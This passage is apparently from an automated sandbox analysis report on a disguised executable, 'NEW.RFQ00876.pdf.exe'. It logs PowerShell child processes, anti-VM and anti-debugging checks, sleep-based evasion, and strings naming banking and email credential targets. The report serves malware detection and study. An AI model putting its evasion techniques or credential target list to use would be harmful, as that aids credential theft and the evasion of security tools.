                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: NEW.RFQ00876.pdf.exe PID: 6360, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RAangyFeHdZLco.exe PID: 7856, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeMemory allocated: 1B00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeMemory allocated: 3350000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeMemory allocated: 5350000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeMemory allocated: 9000000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeMemory allocated: A000000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeMemory allocated: A1F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeMemory allocated: B1F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeMemory allocated: B60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeMemory allocated: 26E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeMemory allocated: 46E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeMemory allocated: 8600000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeMemory allocated: 7100000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeMemory allocated: 9600000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeMemory allocated: A600000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0189096E rdtsc 15_2_0189096E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7229Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 877Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8734Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 772Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeWindow / User API: threadDelayed 1339
                Source: C:\Windows\SysWOW64\msinfo32.exeWindow / User API: threadDelayed 8634
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeAPI coverage: 0.8 %
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeAPI coverage: 0.3 %
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe TID: 7148Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6328Thread sleep count: 7229 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 820Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5416Thread sleep count: 877 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6392Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6340Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe TID: 7876Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exe TID: 7360Thread sleep count: 1339 > 30
                Source: C:\Windows\SysWOW64\msinfo32.exe TID: 7360Thread sleep time: -2678000s >= -30000s
                Source: C:\Windows\SysWOW64\msinfo32.exe TID: 7360Thread sleep count: 8634 > 30
                Source: C:\Windows\SysWOW64\msinfo32.exe TID: 7360Thread sleep time: -17268000s >= -30000s
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe TID: 5364Thread sleep time: -90000s >= -30000s
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe TID: 5364Thread sleep time: -49500s >= -30000s
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe TID: 5364Thread sleep time: -37000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msinfo32.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msinfo32.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 00255Of2.26.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 00255Of2.26.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 00255Of2.26.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 00255Of2.26.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 00255Of2.26.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 00255Of2.26.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: 00255Of2.26.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 00255Of2.26.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: aegBDZrMeWOlT.exe, 0000001B.00000002.3721511741.000000000106F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
                Source: 00255Of2.26.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 00255Of2.26.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: 00255Of2.26.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 00255Of2.26.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 00255Of2.26.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 00255Of2.26.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 00255Of2.26.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 00255Of2.26.drBinary or memory string: discord.comVMware20,11696492231f
                Source: firefox.exe, 0000001D.00000002.1772191232.00000252A0BFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: msinfo32.exe, 0000001A.00000002.3718631099.0000000002E91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD'cy
                Source: 00255Of2.26.drBinary or memory string: global block list test formVMware20,11696492231
                Source: 00255Of2.26.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: 00255Of2.26.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 00255Of2.26.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 00255Of2.26.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 00255Of2.26.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 00255Of2.26.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: 00255Of2.26.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 00255Of2.26.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 00255Of2.26.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 00255Of2.26.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 00255Of2.26.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 00255Of2.26.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 00255Of2.26.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 00255Of2.26.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0189096E rdtsc 15_2_0189096E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_00417BA3 LdrLoadDll,15_2_00417BA3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01890185 mov eax, dword ptr fs:[00000030h]15_2_01890185
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F4180 mov eax, dword ptr fs:[00000030h]15_2_018F4180
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F4180 mov eax, dword ptr fs:[00000030h]15_2_018F4180
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D019F mov eax, dword ptr fs:[00000030h]15_2_018D019F
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D019F mov eax, dword ptr fs:[00000030h]15_2_018D019F
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D019F mov eax, dword ptr fs:[00000030h]15_2_018D019F
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D019F mov eax, dword ptr fs:[00000030h]15_2_018D019F
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184A197 mov eax, dword ptr fs:[00000030h]15_2_0184A197
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184A197 mov eax, dword ptr fs:[00000030h]15_2_0184A197
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184A197 mov eax, dword ptr fs:[00000030h]15_2_0184A197
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0190C188 mov eax, dword ptr fs:[00000030h]15_2_0190C188
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0190C188 mov eax, dword ptr fs:[00000030h]15_2_0190C188
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_019161C3 mov eax, dword ptr fs:[00000030h]15_2_019161C3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_019161C3 mov eax, dword ptr fs:[00000030h]15_2_019161C3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CE1D0 mov eax, dword ptr fs:[00000030h]15_2_018CE1D0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CE1D0 mov eax, dword ptr fs:[00000030h]15_2_018CE1D0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CE1D0 mov ecx, dword ptr fs:[00000030h]15_2_018CE1D0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CE1D0 mov eax, dword ptr fs:[00000030h]15_2_018CE1D0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CE1D0 mov eax, dword ptr fs:[00000030h]15_2_018CE1D0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018801F8 mov eax, dword ptr fs:[00000030h]15_2_018801F8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_019261E5 mov eax, dword ptr fs:[00000030h]15_2_019261E5
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01910115 mov eax, dword ptr fs:[00000030h]15_2_01910115
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018FA118 mov ecx, dword ptr fs:[00000030h]15_2_018FA118
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018FA118 mov eax, dword ptr fs:[00000030h]15_2_018FA118
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018FA118 mov eax, dword ptr fs:[00000030h]15_2_018FA118
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018FA118 mov eax, dword ptr fs:[00000030h]15_2_018FA118
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01880124 mov eax, dword ptr fs:[00000030h]15_2_01880124
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E4144 mov eax, dword ptr fs:[00000030h]15_2_018E4144
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E4144 mov eax, dword ptr fs:[00000030h]15_2_018E4144
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E4144 mov ecx, dword ptr fs:[00000030h]15_2_018E4144
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E4144 mov eax, dword ptr fs:[00000030h]15_2_018E4144
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E4144 mov eax, dword ptr fs:[00000030h]15_2_018E4144
